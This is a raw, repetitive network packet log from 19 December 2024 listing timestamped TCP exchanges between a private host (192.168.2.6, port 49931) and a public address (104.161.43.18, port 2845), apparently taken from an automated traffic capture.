                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.449080944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.449148893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.449263096 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.450052023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.450145006 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.450258017 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.451064110 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.451193094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.451287031 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.452176094 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.452312946 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.452507019 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.453212023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.453340054 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.454261065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.454385996 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.454477072 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.455172062 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.455275059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.455487013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.455604076 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.456342936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.456537008 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.456713915 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.457382917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.457495928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.457689047 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.458408117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.458538055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.458601952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.459602118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.459650993 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.460486889 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.460546970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.460661888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.460731983 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.461596012 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.509258032 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599092960 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599111080 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599173069 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599606991 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599812031 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.599960089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.600023985 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.600851059 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.600931883 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.601037979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.601864100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.602009058 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.602159977 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.602941036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.603076935 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.603255987 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.603997946 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.604065895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.604094028 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.605156898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.605182886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.605297089 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.606167078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.606204987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.606259108 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.607155085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.607204914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.608222008 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.608279943 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.608302116 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.609354973 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.609381914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.609409094 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.610292912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.610510111 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.610532045 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.611355066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.611428022 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.611475945 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.612420082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.612504959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.612535000 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.613450050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.613535881 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.613564014 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.614480019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.614584923 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.614610910 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.615525961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.615596056 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.615633965 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.616653919 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.616719007 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.616764069 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.617727995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.617815018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.617851973 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.618659019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.618719101 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.618767977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.619750023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.619843960 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.619966984 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.620784998 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.620871067 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.620879889 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.621828079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.621896982 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.622000933 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.622890949 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.623018980 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.623075008 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.623963118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.624058962 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.624185085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.625113010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.625309944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.625957012 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.626032114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.626108885 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.626116037 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.627146959 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.627175093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.627228022 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.628204107 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.628323078 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.628359079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.629506111 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.629523039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.629575014 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.630243063 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.630379915 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.630445004 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.631290913 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.631428003 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.631508112 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.632349014 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.632498026 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.632535934 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.633359909 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.633434057 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.633502960 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.634428978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.634497881 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.634517908 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.635488987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.635526896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.635570049 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.636507988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.636605024 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.636614084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.637557030 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.637634039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.637737989 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.638758898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.638834953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.638860941 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.639986992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.640116930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.640166044 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.640942097 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.641017914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.641112089 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.641817093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.641912937 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.641937971 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.642844915 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.642957926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.643012047 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.643884897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.643974066 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.644017935 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.644953966 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.644970894 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.645028114 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.646050930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.646167994 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.646198988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.647017002 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.647080898 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.647141933 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.648085117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.648144960 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.648170948 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.649102926 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.649152994 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.649195910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.650299072 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.650315046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.650430918 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.651231050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.651292086 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.651351929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.652343035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.652359962 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.652415991 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.653343916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.653465033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.653498888 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.696702957 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.791802883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.791892052 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.791963100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.792248011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.792359114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.792476892 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.793262005 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.793392897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.793452978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.794301987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.794455051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.794600010 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.795387983 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.795516968 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.795619011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.796467066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.796562910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.796689034 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.797488928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.797554970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.797611952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.798558950 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.798612118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.798993111 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.799551010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.799760103 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.799827099 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.800821066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.800837040 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.800889015 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.801918030 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.801934958 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.801990032 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.802727938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.802927971 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.802987099 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.803754091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.804079056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.804174900 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.804864883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.805094957 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.805331945 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.805905104 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.806121111 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.806235075 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.806926966 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.807013035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.807058096 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.808079004 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.808100939 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.808159113 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.809045076 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.809176922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.809463978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.810146093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.810214996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.810260057 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.811276913 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.811292887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.812202930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.812271118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.812300920 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.812372923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.813411951 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:17.813427925 CET284549931104.161.43.18192.168.2.6
